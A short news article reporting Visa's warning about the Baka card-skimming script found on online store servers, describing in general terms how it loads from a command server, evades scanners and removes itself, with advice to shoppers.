The new application steals map data and self-destructs

By | September 7, 2020
The new application steals map data and self-destructs

Bank cards and, accordingly, money on them are threatened with a new attack. It was discovered by experts of the Visa payment system. This is a new electronic skimmer that can stealthily “steal” card data. Its uniqueness, in contrast to similar software, is that it self-destructs after it reaches its goal. Visa has already issued an official statement to this effect, where it warns of its existence.

The Baka skimmer was first discovered in February 2020, according to Visa. Experts note that it was written by an experienced and extraordinary programmer. This can be judged, for example, by the extended design and the greater number of functions performed. This also follows from the uniqueness of the bootloader used and the method of masking on user devices. Regular static antivirus scanners cannot find it. The point is that it is loaded dynamically and therefore is not visible to them.
The new application steals map data and self-destructs
In each new case, new encryption is used, which further complicates the task of detecting it. In addition, if the application notices the launch of a dynamic scan (used by the developers), it automatically removes itself from the machine’s memory. During the period from February to the present, the company’s specialists managed to find it on the servers of several online stores, where it was uploaded using the script tag.

After some time, the skimming code was downloaded from the C&C server and then executed in memory. This approach practically excludes the detection of a threat when performing even a thorough analysis of files, both on the store’s server and on the buyer’s computer.

Advice! To pay for purchases in online stores, use virtual intermediary cards, or limit the ability to pay for online purchases immediately after the financial transaction.
Share what you read and add the site to your favorite sources

Leave a Reply

Your email address will not be published. Required fields are marked *

19 + fifteen =